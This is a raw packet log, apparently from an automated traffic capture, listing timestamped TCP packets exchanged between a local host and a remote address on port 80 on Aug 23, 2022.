                                                                                                                                                                      Aug 23, 2022 18:26:31.187808990 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.187813044 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.187829018 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.187829971 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.187848091 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.187853098 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.187868118 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.187881947 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.187885046 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.187903881 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.187910080 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.187928915 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.188040018 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.188057899 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.188107967 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.188122034 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.188134909 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.188143969 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.188148975 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.188164949 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.188167095 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.188184977 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.188215971 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.188230991 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.188244104 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.188607931 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.188616991 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.188620090 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.190169096 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.190257072 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.203397036 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203429937 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203449011 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203466892 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203485966 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203495026 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.203504086 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203521013 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.203524113 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203527927 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.203542948 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203560114 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203577995 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203579903 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.203597069 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203615904 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203622103 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.203629971 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203644037 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.203675985 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.203681946 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.203718901 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.203996897 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204020023 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204039097 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204056025 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204066038 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204072952 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204091072 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204096079 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204113007 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204113960 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204133034 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204139948 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204155922 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204164028 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204181910 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204186916 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204206944 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204210043 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204222918 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204235077 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204257011 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204261065 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204273939 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204281092 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204299927 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204304934 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204324007 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204328060 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204349041 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204355001 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204366922 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204375029 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204390049 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204402924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204416037 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204432964 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204453945 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204467058 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204487085 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204509020 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.204879045 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204902887 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204926014 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204956055 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.204987049 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.205004930 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.205012083 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.205029964 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.205034971 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.205035925 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.205064058 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.205068111 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.205075979 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.205091953 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.205120087 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.205138922 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.220496893 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220535040 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220561028 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220585108 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220614910 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220640898 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220668077 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220689058 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220716000 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220745087 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220772028 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220792055 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.220968008 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.221390009 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.221421003 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.221451044 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.221473932 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.221478939 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.221513033 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.221518993 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.221523046 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.221775055 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.221806049 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.221832991 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.221864939 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.221874952 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.221899986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.221914053 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.221935987 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.221950054 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.221971989 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.221981049 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222001076 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222023964 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222040892 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222045898 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222074986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222089052 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222107887 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222121954 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222142935 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222171068 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222194910 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222206116 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222213030 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222223043 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222242117 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222265959 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222676039 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222722054 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222759008 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222788095 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222796917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222801924 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222822905 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.222847939 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.222872019 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.229851007 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.229926109 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.229928970 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.229984999 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.230003119 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.230021954 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.230043888 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.230079889 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.230823040 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.230876923 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.230902910 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.230927944 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.230927944 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.230961084 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.230988979 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.231010914 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.231015921 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.231057882 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.231089115 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.231101990 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.231111050 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.231137037 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.231158018 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.231187105 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.231189013 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.231235027 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.231240988 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.231281996 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.231287003 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.231328011 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.231338024 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.231437922 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.233639002 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.233694077 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.233736992 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.233778000 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.233792067 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.233834982 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.233840942 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.233845949 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.234544039 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.234611034 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.234635115 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.234658003 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.234667063 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.234695911 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.234718084 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.234757900 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.235904932 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.235940933 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.235964060 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.235981941 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.236033916 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.236053944 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.236130953 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.236155987 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.236181021 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.236193895 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.236208916 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.236251116 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.236255884 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.236282110 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.236308098 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.236325026 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.236341953 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.236346960 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.236373901 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.236387014 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.236972094 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.237006903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.237035036 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.237056971 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.237056971 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.237082005 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.237086058 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.237101078 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.238554001 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.238590956 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.238620996 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.238630056 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.238643885 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.238656044 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.238662958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.238691092 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.252933025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.252968073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.252985954 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.252998114 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253020048 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253035069 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253042936 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253055096 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253063917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253082037 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253082991 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253104925 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253108978 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253119946 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253129005 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253153086 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253154039 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253169060 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253181934 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253202915 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253212929 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253268003 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253287077 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253304958 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253321886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253324032 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253340006 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253369093 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253374100 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253379107 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253398895 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253415108 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253429890 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253439903 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253458977 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253487110 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253761053 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253782034 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253798962 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253833055 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253846884 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.253848076 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253869057 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253887892 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.253900051 CEST4980080192.168.2.645.95.11.158
